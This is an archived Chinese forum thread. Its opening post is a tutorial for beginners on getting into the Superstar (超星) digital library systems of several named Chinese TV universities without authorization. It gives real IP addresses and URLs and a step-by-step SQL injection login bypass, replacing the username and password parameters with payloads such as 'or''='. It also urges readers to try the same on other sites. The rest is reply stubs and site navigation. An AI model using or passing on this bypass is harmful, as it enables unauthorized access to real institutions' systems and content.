| 查看: 1931 | 回复: 32 | |||
| 当前主题已经存档。 | |||
applepie119木虫 (著名写手)
|
[交流]
[分享]新发现利用asp漏洞进超星图书馆秘技
|
||
|
[分享]新发现利用asp漏洞进超星图书馆秘技 这是在看了论坛上的一个帖子后测试找出来的,特向菜鸟们推荐, 希望对大家有所帮助! 深圳广播电视大学数字图书馆 http://218.17.219.22/bookhtm/index.asp 搜索需要输入用户名、密码 我们可以构造查询条件,突破限制 做法如下: 1.随便输入学号、密码,登陆,例如:学号=1,密码=1.这时会出现“此用户不存在!返回” ie地址栏中地址为:http://218.17.219.22/bookhtm/sq/ ... ;B1.x=31&B1.y=6 2.修改地址进入: 将上面地址中user=1&mima=1改为:user='or''='&mima='or''=' 或者user='or'1'='1&mima='or'1'='1 也可 即:http://218.17.219.22/bookhtm/sq/load.asp?user='or''='&mima='or''='&B1.x=31&B1.y=6 就是登陆地址了。 3.登陆后可以随便看了 同样的道理利用这个漏洞,可以登陆另外几个需要输入用户名、密码的站点,需要输入的地方都输上'or''=' 如:驻马店电大:http://www.zmdtvu.net/dabookhtm/ 铜陵电大:http://218.22.180.149/index.asp其他的自己好好发掘吧,^_^ |
回复此楼» 猜你喜欢
国自然申请面上模板最新2026版出了吗?
已经有14人回复
-
计算机、0854电子信息(085401-058412)调剂
已经有5人回复
-
基金委咋了?2026年的指南还没有出来?
已经有3人回复
-
Materials Today Chemistry审稿周期
已经有5人回复
-
溴的反应液脱色
已经有7人回复
-
推荐一本书
已经有12人回复
-
基金申报
已经有4人回复
-
纳米粒子粒径的测量
已经有7人回复
-
常年博士招收(双一流,工科)
已经有4人回复
-
有没有人能给点建议
已经有5人回复
2楼2005-09-04 15:59:00
0.5
 |
3楼2005-09-04 21:49:19
4楼2005-09-04 22:38:39
1
 |
5楼2005-09-06 11:04:14
1
 |
6楼2005-09-06 12:00:27
7楼2005-09-10 20:45:41
728728
木虫 (正式写手)
- 应助: 4 (幼儿园)
- 金币: 4940.1
- 散金: 239
- 帖子: 519
- 在线: 397.7小时
- 虫号: 92818
- 注册: 2005-09-11
- 性别: GG
- 专业: 可再生与替代能源利用中的
8楼2005-09-15 23:32:21
9楼2005-10-07 13:20:51
10楼2005-10-08 15:28:00